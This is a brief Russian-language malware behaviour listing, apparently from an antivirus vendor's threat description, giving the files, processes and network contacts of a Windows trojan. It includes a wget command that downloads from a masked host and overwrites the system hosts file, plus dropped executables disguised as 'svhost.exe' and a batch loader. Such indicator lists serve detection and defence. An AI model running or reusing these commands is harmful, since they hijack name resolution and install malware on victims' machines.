Техническая информация
- <Текущая директория>\wget.exe http://08##.com/Vwc --output-document=<DRIVERS>\etc\hosts
- %TEMP%\%temp%.exe
- %WINDIR%\Temp\svhost.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\loader1.bat" "
- %TEMP%\2.tmp\loader1.bat
- <Текущая директория>\wget.exe
- %TEMP%\%temp%.exe
- %WINDIR%\Temp\svhost.exe
- %TEMP%\xva1.tmp
- %WINDIR%\Temp\svhost.exe
- '08##.com':80
- 08##.com/Vwc
- DNS ASK 08##.com